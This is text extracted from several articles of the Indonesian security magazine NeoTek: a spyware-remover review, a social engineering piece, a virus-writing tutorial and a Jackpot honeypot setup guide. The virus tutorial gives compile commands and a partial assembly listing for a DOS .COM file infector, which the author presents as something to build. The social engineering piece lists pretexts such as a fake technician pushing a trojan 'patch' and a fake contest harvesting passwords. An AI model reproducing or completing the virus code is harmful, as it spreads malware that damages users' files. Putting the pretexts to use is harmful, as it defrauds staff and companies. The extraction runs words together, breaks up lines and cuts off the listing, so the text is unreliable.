    Download tool ini di www.zerospyware.com , pilihan yangbijak jika kita memutuskan untuk memiliki dan menginstaldi PC kita, terlebih lagi apabila sering menggunakan inter-

    net sebagai bagian dari alat bekerja.Fitur lainnya adalah men jaga setting browser anda. Ketika

    anda telahmelakukansettingbrowseranda denganmenghilang-kan autocomplete,

    sebuahspyware juga memiliki kemampuan untuk merubahnyaagar auto complete ter sebut dapat di aktifkan dan mengi-rimkan log kepada pembuatnya. ZeroSpyware menjagasetting browser tersebut dari kenakalan Spyware.

    Fitur yang lainnya yang membuat saya kagum adalah se-mua badan program ini memiliki Animasi. Ini yang belumsaya temukan dari software-software terkemuka lainnya,selain software multimedia tentunya, bahkan AntiVirussendiri tidak memakai sistem animasi. Mungkin denganmemakai animasi seperti ini maka pembuat ZeroSpywareingin melihat sisi Friendly User-nya lebih ditampilkandan dari segi pengguna juga dapat menggunakan dan me-mahami t ool ini sebagai teman dan bukan sebagai satpam.

    Namun memang dibutuhkan sebuah VGA card yang cu-kup untu k melihat animasi ini tanpa memberatkan kom -puter. Animasi ini bukan hanya dalam badan programsaja, melainkan di menu HELP-nya digunakan animasi,sehingga sebuah penjelasan mengenai spyware dan peng-gunaan maupun fitur dan tujuan utama program ini dapatdimengerti pengguna tanpa harus membaca keterangandibawahnya. Sangat inovatif dan kreatif.

    Databasespyware pro-gram ini bisa diupdate danlengkap untukmencari

    spyware danmelindungi darispyware. Me-ngingat bahasanedisi lalu menge-nai BlazzingPerfect

    Keylogger, dimana yang sudah canggih untuk dapat dijalankan di komputer korban secara diam-diam dan fire-wall pun dapat di buat lengah olehnya. Tetapi denganZeroSpyware, keylogger tersebut dibuat lemah tak berda-ya, dikarenakan dalam database ZeroSpyware ini t erdapatdata-data mengenai keylogger tersebut.

    Langkah pencegahan lainnya yaitu langsung dariwww.sysinternals.com/ntw2k/freeware/procexp.shtmlyang dapat membantu anda memonitor software apa sajayang sedang berjalan di komputer anda. Pembersihan se-cara berkala di registry system, msconfig, startup menujuga membantu anda terhindar dari segala bentuk scumwaredan juga baca-baca tent ang scumware yang terbit setiapharinya di www.cexx.org.

    Dan, di www.astalavista.com anda dapat membaca artikeltentang Spyware dan Amerika sebagai negara adidaya na-mun di web ini diterangkan bahwa spammer di negeritersebut memiliki ratting tertinggi di dalam dunia Spam.

    Nah, dengan pembahasan tentang scumware ini makasaya harap pembaca dapat lebih bijak dalam surfing ria,

    dan dapat menghindari scumware yang mengganggu.

    Gambar 4. ZeroSpyware AlertGambar 7. ZeroSpyware mendeteksi BlazzingPerfect Keyloger

    Gambar 6. ZeroSpyware menjaga setting browser

    Gambar 5. ZeroSpyware Quarantine

    Gambar 3. Pencarian scumware dengan menggunakan NoAdware

  • 8/9/2019 NeoTek Vol. IV - No. 11

    16/48

    NeoStart

    16 NeoTek Vol. IV No. 11

    IASANYA MASYARAKAT AWAM UMUMNYA MENGETA-hui bahwa hacker hanya menggunakan komputerdan internet dalam mem-penetrasi jaringan tar-

    getnya. Namun mereka tidak tahu kalau hacker juga meng-gunakan teknik hacking tanpa komputer dan teknologiapapun dalam aksinya.

    Social engineering merupakan teknik hacking yang dilaku-kan dengan melihat segi sosial antar hubungan manusia,dan social engineering sendiri melakukan penetr asi pada

    sebuah keamanan melalui celah psikologis dari seorang ma-nusia. Biasanya dalam hacking biasa kita menemui sebuahinterface misal saja itu sebuah web, konsol dan lainnya.Dalam social engineering juga t erdapat interface, namundalam hal ini yang dijadikan in terface adalah kary awansebuah perusahaan yang dijadikan target.

    Perban dingan Comm on Hack dengan SocialEngineering

    Common Hack

    Sosial Engineering

    Setelah melihat gambaran di atas, dapat dilihat perbedaan

    hacking biasa dengan metode social engineering. Dalamsocial engineering sendiri hacker harus pun ya kemampuanbicara yang bagus, karena hanya mengandalkan kemampuanbicara saja untuk mendapatkan kepercayaan.

    Contoh-contoh dari social engineering

    Tim teknis palsu , berpura-pura sebagai tim teknis yangmenangani kerusakan-kerusakan komputer perusahaan,kemudian memberitahu kepada korban untuk menginstalasisebuah program sebagai patch pada komputer- komputeryang ada. Program ini sudah ditentukan si hacker dan ten-tu saja sebuah malware seperti trojan, keylogger dan lainnya.

    Vendor software palsu, berpur a-pura sebagai Person ofContact (PoC) dari program yang digunakan oleh perusa-

    haan yang bersangkutan dan mencoba meyakinkan akanmelakukan update, namun sebelumnya terlebih dahulu

    meminta akses administr ator, selanjutnya semua jaringanakan berada ditangan.

    W ebsite kont es palsu, membuat sebuah web palsu dengancontent informasi sebuah kontes dengan hadiah-hadiahyang menarik, pendaftaran dibuka dan nantinya yangmendaftarkan diri menjadi member. Data-data memberdirangkum dan e-mail berikut password login dicocokkanke account email yang dimiliki oleh member.

    Karyawan gadungan, meyakinkan bagian sekuriti (sat-

    pam) seakan-akan kehilangan kunci ke ruang kerja danruang komputer, lalu dengan pengaruh tersebut satpamakan membukakan ruang komputer dan ruang kerjanya,selanjutnya aksipun dimulai.

    Kelihatannya gampang, namun social engineering meru-pakan teknik hacking yang paling sulit untuk dilakukandan juga sulit untuk ditanggulangi karena tekniknya yangberhadapan dengan korban secara langsung dengan pengaruh-pengaruh yang ditebarkan si hacker susah untuk dilihat.Orang-orang yang telah menyandang predikat socialengineer terbaik adalah Kevin D. Mitn ick, Ira Winkler,dan satu wanita yang bernama Susan Thunder.

    Social engineering juga sering dipakai dalam industri

    espionage (mata-mata), wanita dalam sosial engineeringlebih diuntungkan dari pria dikarenakan lebih dapat meng-gugah kepercayaan korban dengan segala dayanya.

    Dalam melakukan aksinya, social engineer terlebih dahulumengumpulkan data-data yang berhubungan dengan peru-sahaan/lembaga yang dijadikan t erget sebanyak mungkin,ini dimaksudkan untuk mempermudah dalam mempenga-ruhi dan mendapatkan kepercayaan orang-orang dalamperusahaan seperti karyawan, satpam dan lainny a. Namunyang paling sering menjadi korban sosial engineering adalahbagian Hum as dan Call Center sebuah perusahaan, karenabagian-bagian ini bertugas memberi informasi kepadaorang luar yang ingin tahu lebih tentang perusahaannya.

    Social engineer yang sukses dapat mengambil informasi-informasi berharga, antara lain yaitu:

    ? Password user atau administrator.

    ? Informasi karyawan dan kunci untuk masuk ke dalamperusahaan, terutama ruang penting seperti ruangankomputer.

    ? Laporan keuangan yang bersifat rahasia.

    ? Daftar pelanggan dan prospek penjualan perusahaan.

    Apabila semua data informasi di atas bocor ke lingkunganluar perusahaan, maka perusahaan akan terancam bang-krut , kesetiaan pelanggan berkurang, dan lain sebagainya.

    Untuk menjalani aksinya dalam social engineering maka

    perlu dilakukan empat tahapan, yaitu:? Melakukan riset

    B

    Social EngineeringSocial EngineeringSocial engineering sudah beberapa kali dibahas di majalah ini, tetapi seakan-akan masih kurang

    untuk membeberkan informasi mengenai hal yang akan menjadi bahasan kali ini. Andi Ismayadi([email protected]) kembali mengangkat bahasan seputar social engineering demi

    memuaskan dahaga pembaca setia NeoTek yang masih penasaran dengan social engineering.

    COMPUTER SECURITYCOMPUTER SECURITY

    Gambar 1. Common Hack

    Gambar 3. Save database

  • 8/9/2019 NeoTek Vol. IV - No. 11

    17/48

    ? Membangun kepercayaan

    ? Mengeksploitasi sebuah hubungan untuk sebuahinformasi melalui kata-kata, aksi atau t eknologi

    ? Menggunakan informasi yang dikumpulkan un tuktujuan-tujuan berikutnya.

    Mengais Inform asi

    Seperti yang telah disebut diatas, bahwa social engineerpertama kali kebiasannya adalah mengumpulkan informasi-informasi umu m seputar targetnya. Mencari informasitersebut dapat dengan berbagai cara, antara lain:

    Memakai Internet, mencari sumber informasi di internetlebih mudah dibandingkan mencarinya di selembar koran,cukup membuka Google lalu mencari informasi yang berkaitandengan perusahaan yang menjadi target. Atau mencari le-bih detail di www.hoovers.com, finance.yahoo.com, www.sec.gov.

    Dumpster Diving/Trashing, dumpster diving adalah tek-nik pencarian informasi perusahaan dari dalam dengancara yang tidak lazim, yaitu mengais di tempat sampahperusahaan. Karena karyawan t idak terlalu memikirkandokumen yang telah mereka simpan sehingga kopiannya

    seringkali dibuang begitu saja. Bahaya dari informasiyang bisa diambil, yaitu:

    ? Daftar nomor telepon intern perusahaan

    ? Buku pedoman karyawan

    ? Struktur organisasi

    ? Daftar password

    ? Nota rapat

    ? Laporan-laporan

    ? Diagram jaringan, dan lainnya

    Sistem telepon , social engineer mencari tahu info tentangseorang karyawan hanya dengan mendengar sistem tele-

    ponnya, apakah teleponnya menaruh pesan di mailboxatau t idak. Apabila ya, maka social engineer pun tahu ke-mana dan berapa lama si karyawan pergi, agar nantinya iabisa berpura-pura sebagai karyawan ter sebut dalam aksi-nya nanti.

    Membangun Kepercayaan

    Kepercayaan merupakan kunci utama dalam keberhasilansebuah social engineering, namun kepercayaan adalah halyang susah didapat namun gampang sekali hilang. Biasanyakita hanya mempercayai orang yang sudah kita kenal sebe-lumnya, atau orang yang memang membutuhkan bantuan.Bagaimana social engineer m endapatkan kepercayaan ter -sebut dengan cepat, kita lihat tekniknya yaitu:

    Likability , teknik ini dilakukan berdasarkan informasi awaldari hasil mengumpulkan informasi umum mengenai tar-get. Disini, social engineer membangun kepercayaan denganmelihat sisi kesukaan atau ketertarikan korban. Socialengineer akan mengajak korban untuk bertemu dan mulaimembahas tentang kesukaannya, dengan begitu korbanakan mulai menyukai social engineer tersebut, dan darisisi social engineer sendiri ia telah berhasil membangunkepercayaan pada diri korban.

    Believability , kemampuan untuk dipercayai korban dengansikap yang baik, sopan dan berpura-pur a sebagai orang pen-ting di perusahaan korban ataupun sebagai orang yang di-kenal korban secara baik ,namun belum pernah bertemu,bisa saja kenalan di chating atau dari program messenger.

    Mengeksploit asi Sebuah Hubun gan

    Setelah social engineer mendapatkan sebuah kepercayaandari korbannya, langkah selanjutnya adalah mencoba untukmenggali informasi berharga perusahaan dari lingkunganinternal. Apabila di langkah awal telah dilakukan pengum-pulan informasi secara umum atau diluar lingkungan peru-sahaan, maka kali ini mengumpulkannya dari dalam. Socialengineer melakukannya dengan pelan dan hati-hati, kare-na bisa saja nantiny a kepercayaan yang telah didapat akan

    hilang begitu saja. Dengan keahlian berbicaranya, socialengineer akan fokus kepada sebuah pembicaraan dengankorban dengan cepat namun tepat sehingga korbanpun akankehilangan konsentrasi berbicara, akibatny a ia akan men -jawab segala pertanyaan yang diajukan social engineer.

    Mengeksploitasi sebuah hubungan tidak selalu hanya ber -temu dengan korban secara langsung tatap mu ka. Namunsecara online pun juga bisa mengeksploitasinya, bisa sajasocial engineer dengan kepercayaan yang ia dapat mengi-rimkan email ke korban menyuruhnya untuk melakukanpatch Operating System yang dimiliki dengan sebuah programyang didalamnya terdapat remote control. Ataupun denganmenyisipkan keylogger atau trojan di sebuah gambar ke-luarga. Apapun bisa terjadi setelah kepercayaan didapat.

    Pencegahan Social Engineering

    Setelah dibahas panjang lebar tent ang social engineering,maka dengan begitu kita perlu mengetahui bahwa bahayayang ditimbulkan bisa lebih besar daripada hacking umumnyayang hanya merusak sebuah sistem jaringan komputer.Social engineering bisa dikatakan ilmu mata-mata, ilmuyang berbahaya yang perlu dipelajari untuk mengetahuikelemahan diri sendiri dan menangkal dari t indakan socialengineering. Berikut beberapa cara pencegahannya.

    Dari sisi perusahaan:

    ? Mengklasifikasi data-data

    ? Memusnahkan data karyawan dan kontraktor dan

    user idnya? Mengganti password secara berkala

    ? Menangani informasi yang rahasia secara benar

    ? Mengawal tamu yang berkunjung ke dalam perusahaan

    Dari sisi user:

    ? Meningkatkan kesadaran keamanan dan melatihsebagai investasi bisnis

    ? Melatih userakan dasar-dasar keamanan agar tetapterjaga keamanan perusahaan.

    ? Biasakan memusnahkan dokumen-dokumen, jangandibuang tapi di musnahkan, bisa dengan shredder.

    ? Jangan pernah memberikan password kepada siapapun? Menggun akan password yang berbeda

    ? Mengganti password secara berkala

    ? Jangan pernah membuka ataupun mengirim file keatau dari orang asing.

    Dengan pencegahan diatas, mudah-mudahan anda dapatterhindar dari social engineering. Dan untuk mengetahuilebih lanjut dan contoh kasus tentang social engineeringanda dapat membaca buku The A rt Of Deception karyaKevin D. Mitnick dan Spies Am ong Uskarya Ira Winkler.Dan jangan samakan sosial engineering dengan Menipukarena berbeda jauh, anggapan ini sering saya dengar. Ja-dikan informasi ini sebagai bahan pelajaran dan tidak di-gunakan untuk hal-hal ilegal. Penulis tidak bertanggungjawab atas penyalahgunaan tulisan ini.

    NeoStart

    Vol. IV No. 11 NeoTek 17

  • 8/9/2019 NeoTek Vol. IV - No. 11

    18/48

    NeoStart

    18 NeoTek Vol. IV No. 11

    ITA PARA PENGGUNA KOMPUTER YANG SUDAH AHLI

    atau professional maupun para pemula dan semuapenguna komputer tentu sudah tidak asing lagi

    dengan istilah virus komputer, atau anda telah menjadikorbannya.

    Bagaimana perasaan anda pada waktu anda menjadi kor-ban keganasan virus komputer? Yang saya tahu pasti andakesal, marah, frustasi dan mengutuk para pembuat virus.

    Tapi tidak semuanya begitu, ada sekelompok orang yang

    senang bila komputernya terkena virus atau mereka se-ngaja memasukkan virus kekomputer mereka, apalagi vi-rus itu jenis baru dan yang pasti lebih berbahaya. Danmereka nantinya akan meneliti virus tersebut lalu dikem-bangkan unt uk dijadikan virus yang lebih berbahaya.

    Tapi bagaimana dengan perasaan pembuat virus itu?Apakah senang, bangga atau biasa saja?

    Di dalam artikel ini anda akan saya ajak untuk ikut mera-sakan dalam membuat virus komputer, buku ini ditulishanya untuk pembelajaran atau hanya untuk pendidikansemata, dan semuanya saya kembalikan kepada sikap ke-dewasaan anda.

    Di artikel ini anda akan diajari cara-cara membuat viru s

    komputer dengan bahasa pemrograman tingkat dasar ataubahasa mesin yaitu bahasa pemrograman assembler atauassembling, yang banyak digunakan oleh para pembuatvirus, dikarena ukuran file yang dihasilkan (dibuku in iadalah virus) lebih kecil dibanding dengan bahasa pem-rograman lainnya tanpa mengurangi kemampuannyayang dashyat.

    Dan listing virus yang akan saya berikan pada pertemuanini adalah listing virus _468.

    Listing virus ini di kembangkan dari virus ALT-11 Magdan diberi nama _468, apa artinya nama itu, yang pastilebih ganas dan bagus, maunya sih.

    Keterangan Virus _468

    ? Tidak menginfeksi command.com

    ? Pertambahan file .com: xxx byte

    ? Dapat mencari direktori untuk file yang belum pernahterinfeksi, bila tidak ada akan mencari direktorisebelumn ya, sampai file terinfeksi

    ? Tidak akan melakukan lagi bila (melakukanpenginfeksian) file yang sudah terinfeksi (setiapberjalan menginfeksi satu)

    ? Akan mengembalikan atribut asli dari file yangdiinfeksinya dan mengembalikan alur aslinya (originalpath)

    ? File yang memiliki atribut atau bendera read only(hanya membaca) tetap dapat diinfeksi

    Cara mengkompile

    tasm /m2 .asm

    tlink /t < filename>.obj

    Listing virus _468

    Ketikan listing virus ini dengan pelan-pelan dan teliti lalusimpan dengan nama _486.Asm atau nama yang lainyang pent ing harus berekstensi Asm (*.Asm), dancompile-lah sesuai cara diatas sehingga dapat membentuksuatu program (virus).

    Sekian dulu pertemuan kita pada kali ini, suatu saat ka-lian pasti bertemu denganku pada artikel artikel selan-jutnya, yang pasti tidak kalah menariknya.

    Sampai jumpa lagi...

    K

    Membuat Virus 486Membuat Virus 486Menjadi korban virus mungkin adalah hal yang menyedihkan. Bahasan seputar virus adalah

    bahasan yang asyik untuk disimak, telah beberapa kali bahasan virus diangkat di majalah ini.Ade The Teroris memberikan cara membuat virus dengan menggunakan Assembly Language,

    yaitu bahasa pemrograman yang populer.

    COMPUTER SECURITYCOMPUTER SECURITY

    TextBox 1. Script code lengkap dapat ditemukan di lampiran yangdisediakan di dalam CD yang disertakan bersama majalah ini.

    .model tiny

    .code

    org 100h ; melakukan penyesuaian untuk psp

    start:

    call get_disp ; masukkan ipget_disp:

    pop bp

    sub bp, offset get_disp ; bp = penggantian ; kode

    ; label offset asli disimpan

    ;di dalam kode mesinsave_path:

    mov ah , 47h ; simpan cwd

    xor dl, dl ; 0 = default drive

    lea si, [bp + org_path ]

    int 21hget_dta:

    mov ah, 2fh

    int 21h

    mov [bp + old_dta_off], bx ; simpan dta offset tua

    set_dta: ; merekam dtamov ah, 1ah

    lea dx, [bp + dta_filler]

    int 21h

    search:

    mov ah, 4eh ; temukan file pertamamov cx, [bp + sea rch_attrib] ; jika dta sukse s

    diciptakan

    lea dx, [bp + search_mask]

    int 21h

    jnc clear_att rib ;jika ditemuka n, melan jutkanfind_next:

    mov ah, 4fh ; ke file berikutnya

    int 21h

    jnc clear_attrib

    still_searching:mov ah, 3bh

    lea dx, [bp + previous_dir] ; cd ..

    int 21h

  • 8/9/2019 NeoTek Vol. IV - No. 11

    19/48

    NeoTekno

    Vol. IV No. 11 NeoTek 19

    ACKPOT MERUPAKAN HONEYPOT SMTP RELAY YANGditulis dalam bahasa Java, oleh pembuatnya di-sebut mail swerver (bukan mail server). Jackpot

    akan nampak di Internet sebagai open SMTP relay, dandimaksudkan untuk menarik perhatian spammer (danjuga hacker).

    Jackpot bisa mengamati spam yang dicatat secara real-time.Kita bisa memeriksa perint ah-perin tah yang dikirim seba-gai spam ke Jackpot, yang mana sulit dilakukan bila kita

    hanya mengandalkan spamtrap address. Dengan menja-lankan suatu honeypot relay di komputer kita, kita telahberkontribusi pada perang melawan spam email.

    Idealnya, untuk memasang Jackpot, komputer kita terhu-bung ke Intern et dengan alamat IP permanen. Karenaspammer biasanya mengirim bulk mail mereka beberapahari setelah menemukan suatu open relay. Sementara bi-la memakai koneksi dial-up, kali lain ia mencoba mencarikomputer kita mungkin saja kita t idak sedang online ataualamat IP kita mengalami perubahan. Spammer juga akanmengabaikan komputer anda bila ia mengetahui bahwakoneksi anda adalah dial-up.

    Instalasi & k onfigur asi

    Jackpot ditulis sepenuhnya dalam Java, sehingga di kom-puter kita perlu diinstall dulu Java Runtime Environment(JRE) atau Java Develompment Kit (JDK/ J2SDK) versi 1.3ke atas. Jackpot bisa berjalan pada Windows 2000/XP/NT/98/ME,dan seharusnya berjalan baik juga pada Linux. Perlu di-ingat, Jackpot memakai thread secara intensif, dan hal inibelum tertangani dengan cukup baik oleh Windows 98/ME.

    Untuk menginstall software ini, lakukan unzip filejackpot-1.2.2.zip ke suatu folder. Anda akan melihat se-jumlah file konfigurasi di situ. Kita bisa mengedit filejackpot.properties yang merupakan pasangan key/ value,dimana value adalah string yang dipergunakan Jackpotsebagai suatu respon pada perintah-perintah dari spam-mer. Dengan m engubahnya dari konfigurasi default, anda

    bisa menyulitkan deteksi fingerprint spammer bahwarelay kita sebenarnya adalah honeypot.

    Para pengguna Windows 98, jalankan Jackpot.bat un tukmengaktifkan Jackpot. Sedang pengguna Windows NT/XP/2K,lebih baik memakai shortcut jackpot.run . Dari WindowsExplorer klik kanan file jackpot.run.lnk, edit working fol-der ke tempat dimana anda melakukan unzip Jackpot, dan

    ubah ikon ke honey.icodi folder tersebut.

    Nant inya jendela con-sole Jackpot akan mem-

    punyai ikon honeypotyang cantik tersebutketimbang ikon defaultblack-screen. SetelahJackpot dijalankan, kitabisa mengakses web-server Jackpot (portdefault 8080) untukmemeriksa spam yangditangkap dan menge -lola program Jackpotdengan menggunakanbrowser web ke alamat

    http:// servername:port/h tml/, contohhttp://192.168.0.1:8080/html/.

    Untuk mengakses layanan administrator, anda memerlu-kan userid dan password yang dapat diubah dari baris be-rikut pada jackpot.properties:

    #UserID for access to web-admin

    AdminUser=admin

    # Password for access to Web-admin

    AdminPassword=admin

    Nomor port server web tersebut dapat diubah pada barisberikut (default 8080), mengubahnya akan menyulitkanhacker yang melakukan fingerprint:

    #Port for serving HTTP; it would be a good idea to change this,

    because the# Jackpot server could be fingerprinted by finding it's HTTP

    server.

    HttpPort=8080

    Jangan lupa mengubah variabel Server (default adalahJackpot) yang merupakan header HTTP:

    #This entry specifies the value retuned in the "Server: " HTTP

    header returned

    #by Jackpot. By default, Jackpot claims to be "Jackpot" (with

    the current version numb er).

    ServerHeader=

    Anda bisa melakukan aksi tarpit alias memperlambatkoneksi spammer dengan mengubah baris berikut:

    # Extra time taken to respon d to commands when in a sp amrun.

    #This is applied to every line entered in a HELO dioalog; the

    Anti-Spam Berbasis JavaAnti-Spam Berbasis JavaPemanfaatan honeypot untuk menjebak hacker menjadikan honeypot sebuah pilihan yang

    tepat saat ini untuk menciptakan keamanan sistem yang anda miliki. Untuk melengkapi bahasanmengenai honeypot, Firrar Utdirartatmo ([email protected]) kembali membahas mengenai

    honepot dengan membuat Jackpot honeypot Anti-Spam berbasis Java.

    HONEYPOTHONEYPOT

    J

    Gambar 1.

    Hasil unzipJackpot

    Gambar 2. Properties shortcut Jackpot

  • 8/9/2019 NeoTek Vol. IV - No. 11

    20/48

  • 8/9/2019 NeoTek Vol. IV - No. 11

    21/48

    NeoTekno

    Vol. IV No. 11 NeoTek 21

    Nampak aktivitas akses ke HTTP juga dicatat:

    03/ 11/ 08 05:55:55 GMT HTTP 192 .168.0.1 192 .168.0.1

    GET /html HTTP/1.1

    03/ 11/ 08 05:55:59 GMT HTTP 192 .168.0.1 192 .168.0.1

    GET /htm l/ HTTP/1.1

    03/ 11/ 08 05:55:59 GMT HTTP 192 .168.0.1 192 .168.0.1

    GET /h tml/ jackpot .css HTTP/1 .1

    03/ 11/ 08 05:56:29 GMT HTTP 192 .168.0.1 192 .168.0.1

    GET /h tml/ hos ts.htm l HTTP/1 .103/ 11/ 08 05:56:43 GMT HTTP 192 .168.0.1 192 .168.0.1

    GET /h tml/ hos ts/ NEWBIE.htm l HTTP/1.1

    03/ 11/ 08 05:56:55 GMT HTTP 192 .168.0.1 192 .168.0.1

    GET /h tml/ hos ts.htm l HTTP/1 .1

    03/ 11/ 08 05:5 6:57 GMT HTTP 192 .168.0.1 192 .168.0 .1

    GET /h tml/ hos ts/ NEWBIE.htm l HTTP/1.1

    03/ 11/ 08 05:56:59 GMT HTTP 192 .168.0.1 192 .168.0.1

    GET /html/messages/C0A80001-3E67150F

    File jackpot.log menyimpan log lengkap baik dari SMTPserver maupun HTTP server:

    Untuk melakukan pengelo-laan Jackpot, mulailah kehalaman awal, dan pilihAdminister Jackpot. Di sinianda harus memasukkanusername dan password,kalau anda belum mengu-bah file jackpot.propertiesmaka defaultnya adalahadmin.

    Catatan: Untuk keamanananda, bila Jackpot dipergu -nakan di dunia nyata, anda

    bisa matikan dulu service HTTP, agar tidak bisa diakses

    web browser dari luar. Nanti saat anda perlukan untuk

    analisa atau pengelolaan, bisa anda aktifkan lagi. Baris difile jackpot.properties yang berkaitan:

    #Whether to start the HTTP service.

    StartupHttp=yes

    Penjelasan: pr oxy spam dan r elay spam

    Open proxy merupakan cara yang menarik bagi spammerunt uk mengirimkan mail. Open proxy adalah proxy yang

    memungkinkan orang melakukan koneksi ke sistem lain-nya, tanpa perlu autent ifikasi (misal dengan password).

    Proxy t idak melakukan store-and-forward, seperti yangdilakukan mail-relay; tetapi perintah akan dikirim lang-sung ke sistem target. Proxy tidak menambahkan infor-masi tracing ke "benda" yang dikirimnya, tetapi meme-lihara log lokal, dan meneruskannya tanpa perubahan.Satu-satunya cara untuk menemukan penyalahgunaanopen proxy adalah dengan melihat log proxy. M eski me-ngundang masalah, masih banyak pihak yang gemar me-ngaktifkan open proxy, misal sejumlah website advertising.

    Kebanyakan SMTP server (yang dikonfigurasi dengan tepat)hanya menerima mail message yang memenuhi dua syarat:

    ? Message dikirim oleh user domain yang menjaditanggungjawab mail server

    ? Message ditujukan pada user dalam domain tersebut.

    Dengan diperkenalkannya Domain Name System (DNS),mail server sering menerima mail dari siapa saja, untuksiapa saja; server akan melakukan usaha t erbaik untu k re-lay mail ke mail-server dari mail-domain bersangkutan(bisa dengan meneruskan message ke mail-server lainnya).Server semacam itu disebut sebagai open relay .

    Spammer menyalahgunakan open relay yang ditemukandengan melakukan spam melaluinya. Dengan mengala-matkan setiap message ke sejumlah besar